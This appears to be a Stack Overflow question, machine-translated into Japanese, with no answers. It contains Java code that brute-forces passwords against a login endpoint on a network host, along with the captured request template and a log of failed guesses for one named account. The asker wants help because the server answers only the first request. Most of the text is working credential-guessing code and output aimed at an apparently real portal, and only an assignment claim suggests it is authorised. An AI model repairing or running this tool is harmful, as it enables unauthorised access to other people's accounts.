0

私は、大学の課題の一環としてブルート フォース アルゴリズムを実装していました。私のプログラムは、毎回異なるパスワードで投稿要求をサーバーに送信します。問題は、最初のリクエストに対してのみ応答を取得し、その後のリクエストに対してサーバーがまったく応答しないことです。

これがコードです。

ブルートフォース.java

import java.io.*;
import java.net.*;

class BruteForce
{
private byte[] seq = new byte[]{0,0,0,0,0,0};
private char[] map = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".toCharArray();
public static void main(String[] args) throws IOException
{
    BruteForce bf = new BruteForce();
    bf.go(args[0]);
}

public void next(int i)
{
    seq[i]++;
    if(seq[i]==62)
    {
        seq[i]=0;
        next(i-1);
    }
}

public void go(String st) throws IOException
{
    int l;
    RequestReader reqMan = new RequestReader();
    String t[] = reqMan.constructRequestString(new File(st));
    String header = t[0];
    String param = t[1];
    t = null;


    //SocketAddress addr = new InetSocketAddress("127.0.0.1", 8888);
    //Proxy proxy = new Proxy(Proxy.Type.SOCKS, addr);
    Socket s = new Socket();
    InetSocketAddress dest = new InetSocketAddress("10.10.10.9", 8090);
    s.connect(dest);

    BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream()));
    PrintWriter w = new PrintWriter(s.getOutputStream());

    //Actual BruteForce Algorithm

    int index = 5;
    while(seq[0] != 1)
    {
        String pass="";

        //for(int j=0;j<6;j++)
        //System.out.print(seq[j]+" ");
        //System.out.println();

        for(int i=1;i<=5;i++)
        {
            pass = pass + map[seq[i]];
        }

        //r = new BufferedReader(new InputStreamReader(s.getInputStream()));

        String tp = header + "\n\n" + param.replace("password=","password="+pass);
        System.out.println(tp);
        w.write(tp);
        w.flush();

        while((l=r.read())!=-1)
        System.out.print((char)l);

        System.out.println();

        try
        {
            Thread.sleep(10000);
        }
        catch(Exception e)
        {}

        next(index);
    }       
}
}

RequestReader.java

import java.io.*;

class RequestReader
{
public static void main(String[] args) throws IOException
{
    RequestReader reqRead = new RequestReader();
    String[] t = reqRead.constructRequestString(new File(args[0]));
    System.out.print(t[0]+"\n"+t[1]);
}

public String[] constructRequestString(File f) throws IOException
{
    String temp="";
    int ch;
    BufferedReader in = new BufferedReader(new InputStreamReader(new FileInputStream(f)));
    while((ch=in.read())!= -1)
    {
        temp += (char)ch;
    }
    //System.out.print(temp);
    String[] tokens = temp.split("\n\n");
    tokens[1] = tokens[1].replace("\n","");     //'\n' is automatically added to the end of string while reading. This line truncates '\n'.


    in.close();
    return tokens;
}
}

ファイル

POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko)            Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

mode=191&username=syedshahyasser.hussain.it14&password=&a=1379675423937&producttype=0

結果

POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko)      Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

mode=191&username=syedshahyasser.hussain.it14&password=aaaaa&a=1379675423937&producttype=0
HTTP/1.1 200 OK
Connection: close
Content-Type: text/xml

<?xml version='1.0' ?><requestresponse><status>LOGIN</status><message><![CDATA[The system could not log you on. Make sure your password is correct]]></message><logoutmessage>You have successfully logged off</logoutmessage><state></state></requestresponse> 

POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko)       Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

mode=191&username=syedshahyasser.hussain.it14&password=aaaab&a=1379675423937&producttype=0

POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko)     Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

mode=191&username=syedshahyasser.hussain.it14&password=aaaac&a=1379675423937&producttype=0

POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

mode=191&username=syedshahyasser.hussain.it14&password=aaaad&a=1379675423937&producttype=0

ご覧のとおり、最初のリクエストとレスポンスは正常に動作します。それ以降、リクエストは送信されますが、レスポンスが届きません。

4

0 に答える 0